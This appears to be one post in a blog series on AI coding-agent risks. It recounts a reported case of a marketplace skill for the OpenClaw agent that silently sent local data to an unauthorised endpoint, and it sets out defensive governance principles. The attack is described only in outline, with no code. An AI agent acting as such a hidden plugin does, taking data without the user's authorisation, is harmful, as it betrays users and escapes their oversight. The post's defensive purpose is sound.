I Trusted a Random AI Plugin… Until Cisco Showed It Was Stealing Data Behind My Back - 07 of 21

In the first week of 2026, Cisco's AI security research team published a finding.

A third-party skill, a plugin, available in the OpenClaw agent marketplace had been performing data exfiltration. Silently. The skill appeared functional. It did what its documentation claimed. It also, without any indication, extracted sensitive data from the local environment and transmitted it to an external endpoint the user had never authorised.

One of OpenClaw's core maintainers responded on Discord: "If you can't understand how to run a command line, this is far too dangerous of a project for you to use safely. "

Three months later, the Chinese government restricted state agencies from running OpenClaw on office computers, citing unauthorised data deletion, data leaks, and excessive resource usage.

This is the risk conversation of 2026. Not "will AI write a bug." That's manageable. That's code review.

The new risk: agents that act autonomously, with file-write permissions, git commit access, and CI/CD pipeline control, making decisions at 2am when no human is watching.

45% of all deployments linked to AI-generated code led to problems (Harness, 2025).

48% of organisations reported increased security vulnerability concerns from AI-assisted coding.

These numbers are from environments where human engineers were still reviewing AI output.

The governance principles that are non-negotiable before you grant an agent broad permissions:

1. Default to cautious autonomy. Start at the most restrictive setting that still makes the agent useful. Expand permissions based on observed behaviour over time.

2. Mandate audit logging. Every action an agent takes must be logged. Not for compliance theatre. Because the only forensic tool when something goes wrong is the record of what happened.

3. Design for reversibility. Git commits at meaningful checkpoints. All agent changes must be undoable. An agent operating in a system where its changes can't be reversed is an agent with uncapped blast radius.

4. Treat third-party skills like npm packages. No, treat them with more scrutiny. A malicious npm package compromises your application. A malicious agent skill compromises your agent, which has system permissions.

5. Accountability cannot be delegated. The agent opened the PR. You own the PR. The agent committed the code. You own the code. Always.

Tomorrow: the tool that changed how I think about code generation entirely. And the landscape of every AI coding agent you should know in 2026.